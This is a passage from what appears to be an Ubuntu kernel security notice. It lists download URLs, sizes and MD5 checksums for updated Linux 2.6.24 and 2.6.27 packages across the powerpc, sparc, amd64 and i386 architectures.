http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   770960 ac691fac4ab28cb6d9627fa6b7a5b773\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   243328 b280fefee27294e988529239616e68fe\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   246310 c1d7e140ca2ba026b6a168c6c9748476\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    69160 665a09e07612701e5c6bc7efee856e5c\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   132586 f0e732beade4d5154e887aaa1b1f3625\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    70252 d8f056e2c9d8aabe9acacfbe4e6c9de0\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    77462 d69a84be1856d83b83faf1fa820803f6\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   146272 11a1d0911e3fda9667661975972e08b2\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   165002 c4276844b0ea79946508c0cd3a816541\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   387992 53b23049b6f79a9609349927adec3443\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   350468 694a94354856e10bcc935e2a7ba38a51\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  2431460 3a8171d7d1e7e6b37573c6679812d2ae\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  3473330 1037b52b34e3b26b05f68bfafb48850a\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5:   652854 26483fb509f744914f646c49eb7b4d6c\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5:   657530 98dd4c49966d886237bed19fddb84057\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb\n      Size/MD5:   652742 c9f225771751b175bc9a3d1ccb9b2b91\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5: 20175388 98b77e06737b717f07a9f436bf292879\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5: 21378902 be6b07df3db6828d5d795954b3ad3c49\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb\n      Size/MD5: 19948474 1a42e203300936a0a6bbd91270ac925d\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_powerpc.deb\n      Size/MD5:   697738 b5f3e2a2bf27249b08f44ca708c75305\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   266748 d71a805e23acc800f21449d312975e04\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   307732 90c6243c8802cdc121bdf92145f7dc17\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   192250 b114447f81aee3dfc51a3c40f2015d66\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   201688 94056840984e621b385099d261ce2420\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   272012 b6790aca1401ed43b8c04befaef9af51\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   306006 50b970f3b69d4eda6d3e59353c9db152\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  1807766 ec7ddb35df35bb103f7fa00168c827cd\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  2119612 ee4db3863509964860b0a24a9a6d5951\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   235186 b6a1a89f7279818e17cac5d5b3a8b86e\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   225404 baf5ea09bdbab57626dee3afb306a39b\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   170438 b6bae0ce9350745a5c5ba8d969ae34ef\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   199752 9d4225f0960410c78279f61aa02471da\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   117942 e88c2b968d47d71ef068dcb5abd4d9fd\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   139272 5f4576b20a9dc27976d521d0942ad0c9\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    45372 918120c1bd011bbbb8b95529c0978f09\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    46836 10f5de3e02406e28d373098a6613860b\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    51132 610f6b349ffcb68ca7f58dc7928a7558\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    60292 9b17fdf2d2aa9cbcfd3dbfb1bfc3af41\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    74186 053cc99e1839e95e6e48198a187c3e48\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    87220 b730de88a2ee8d0b1503d2ee30f13e69\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    76092 0a6aab3a33606ec7e97d474de29a47db\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    30230 76c4d08ce66715d75db459c89405a0fb\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:     8486 80580934d5e5f6909c396732bedf2055\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    10030 4e52e0e6b321b919404ffa406ccc2da1\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    57438 24e1b5d61bcbe2b2faf9f31d9b6f7d3b\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    68746 1b541e58e95b8022b84e7d050db97ecc\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   101184 97ff0fdbf93ef2526b1a97b962592e37\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   147834 eb62d695f6da016ae938924414bd15ed\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  1565722 3bf6b2bd7ef98c403f8cedf220978814\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  1514590 307c47dc707e3c96384e6ce043c745be\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    76672 863a1d5aaef2e7d8f5ec43318a2b3f7a\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    85976 b6bedff825f704ceb1269488d698bfbf\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    12702 cc2c9e83433b8f4092748b933292a46b\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    14560 60c8e6f2c5425b8bfea2cbee00dd50c2\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   449632 ff75fd65c13af279e6652e0d09505887\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   504134 364077fbb2c074eb8852249a757b89ae\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    83682 bcafd92384fdae95293c310f83443303\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   108840 2254f5416b8a0cd8d1cd52a57d7a064a\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    59570 0a8a1c6f109f6620c74d81880a6836ef\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    71732 e29b3839ae80a5cc8b8ca1756569e0bb\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    42454 35c72663f93201098e40f0fc36232ccc\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    91776 d7f14f387c9d325ba87761a2da581b5c\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   587190 a4606a71370a3dec9dc6a3aba35ec115\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   171076 2f15afec1e2aa78035659ac46b010cb3\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    22356 aa2c6396604a45f318881df2e562f625\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    46058 5633652b0f71f9e2098ce2798e29269f\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   152976 d7cbf92b5ae85f379d0335c693ccc256\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:  2135270 f05d76791e5538fa887f7731d170dc58\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb\n      Size/MD5:   565588 5d632e2a56604e4feff30e310f17f024\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb\n      Size/MD5:   563928 4b591c5db77c0f5bc41ffff32a14ee31\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb\n      Size/MD5: 14098262 0170c4f2c460270add65ba17eb7acfd0\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb\n      Size/MD5: 13830862 e4b6c695ad5b3e4ad0b428947b4fd388\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_sparc.deb\n      Size/MD5:   752654 6e9b50c2f72a60edf4df6e51d5448cc7\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   270064 879ee6667df636551d565e10ae5162fd\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   190360 388a92b9849a34e99f6a3d2817ca9b05\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   263030 82e8bd5f9f922af935f6f787942f4b2f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:  1386520 98436d21f7255a6c923b50900bd2de4d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   175444 37239b1899dd449d5b4985163c46d678\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   122106 1b86f75278b7fab22bbffd2c0010eef5\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    40398 81325db98acd64573c100455f0cb5289\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    48060 dd1b8744fcecf5959d2dac4a23b8cd34\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:     8698 a2a5a2941546e0137d8c57a38ba9ab2f\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    60516 08d388a60ac9be5c7d80d479f94fd4aa\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   106838 b350cddddb73537859dce8203c49ac1d\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:  1002034 0756e59f467bdefbc26dcb06a6201457\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:     9518 7bf2df83ac5364fef90bf13ea616e7e3\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   391514 9e98f9f4757387d261d6c7a1e8c7d61d\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    75924 b375f2838ce3f024a9f2b58d02f9d98e\n\nUpdated packages for Ubuntu 8.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.diff.gz\n      Size/MD5:  3279295 99a1653c9f3eb96475ee9776faff3701\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.dsc\n      Size/MD5:     2761 3b7c2f9d1b970a69db9a1c2c2bd5d95c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz\n      Size/MD5: 63721466 482b04f680ce6676114ccfaaf8f66a55\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.45_all.deb\n      Size/MD5:  3492310 1dbaf1873425d41dfce3b359fc95728e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.45_all.deb\n      Size/MD5:  5906568 e4cb3deaf39ad7c3917d33f0f1082a40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.45_all.deb\n      Size/MD5: 52050112 2852d57c251b525e97d6ba66a94f1be5\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    36530 ae958becd299698d5f30f722eb07cde7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   265218 1de0174009daaf9e0d3fb8f8e737fa40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    53438 46087922e5b4128b6a5f52dcacfbf840\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    43030 e25c2b8fbd4f46654a1ebc6089ef31bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    52344 4c16a22c0fe8f2a967f1503953ed5f8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    89844 4cc23c275cc1fd6621ac977881b91345\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    38180 24f5566a9c89334d394fb48d7c3d4949\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   677070 84220f4d0562b59edd2f0865120d4494\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   158618 edbaf560c5847b8f520ad94cd3f8d2d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    46346 90f299bb91f23a67e0811ae8e0472e70\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   154240 3ccfee605d2ef5a5e87aeb71320b337b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   313106 896f96e4eb01ff9381aaa78b6e1dc72d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:  2604320 b50756ed8aeeee4a72873b8c60df10b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_amd64.deb\n      Size/MD5:   663304 ef966b97630e8096fcf279d6c43b3960\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_amd64.deb\n      Size/MD5:   662184 599a4bf3bad78733d35ad1b4a5601a25\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_amd64.deb\n      Size/MD5: 23073032 96da11b5c1a75a1694b4047c1a71b091\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_amd64.deb\n      Size/MD5: 23071096 162a682066d9c7d90df92c975698b2cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_amd64.deb\n      Size/MD5: 10479836 39042ef6e7f9049837b4d137450dc41a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_amd64.deb\n      Size/MD5:   675844 3d711e518906ef37120bccabeaa1da2d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   434926 cc27207ed63847b17eab47e1978c98fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   186500 940e6b351f4975369720543184596a04\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   275594 b525586af57630fd8b4e098cef404ad9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:  1810688 13f3abe5b38ff8a704c985dc8f3275b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   151324 d883249df4fb86d6d9d1146db5fa1020\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   194282 ee6a6162a8b0615e73a89978fcb9d172\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   168150 696ed64f02936c7200cc9a468302de40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    36428 ff94b9ab68b2108fd9d1d2475c211725\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    83436 3dceac801e8b0405790e1a28c960183f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    71992 2b936af85a4eceb6312ad7ef93a18c88\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    23240 1d34a195f16d39f7895a2bf36281a6c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:     9012 454b1c03d70fbf4a917ff2431b6b4f2b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    68544 cd2e39978716c3448e54d6862877957c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   110302 ecb1005946c139f2340aaee3e80cd152\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:  1276186 d93285c15892be57cfb76798c746f88d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    47602 d2039335dc8bb4104fbb473b5ada0d96\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    13480 5299f432e2db456a3e0743fd786c18f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   393936 83cfaf207498b9a60d4e97cd21309095\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   200806 5dfbdf4ce61cbe469582c94509160a42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    13614 c860448fa643364e8776a4947cff9714\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    33948 74da15b4b68dc6a03f2da65175b021bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   244732 aee21df42a017731c52c53100cbf2f20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    55398 f4d1c18a70aec1e3e39572c36318115c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    41206 42a8188a1ad868fa58aa779b31908d65\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    48698 7e06c0fbdb39f426e1259d35e8f1505e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    86942 49099dad48131ce191b10c154f096d6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    34064 c8cf2cb88451687abb047df2faae44f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   675492 3e953f324652ef7a01f93aeaa2dc5e55\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   158402 aa593e2736e7b717ea8c561b1e11c27b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    43624 b2ca8774a7cf447123ea811781e80dbf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   145226 0fbb95dc0bc59baf91447250f19e7d45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   302390 991c8e4ef2dda71d6deda5599129a768\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:  2436572 4b845d0a28c2b48ad0c29521bae3a0b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_i386.deb\n      Size/MD5:   645046 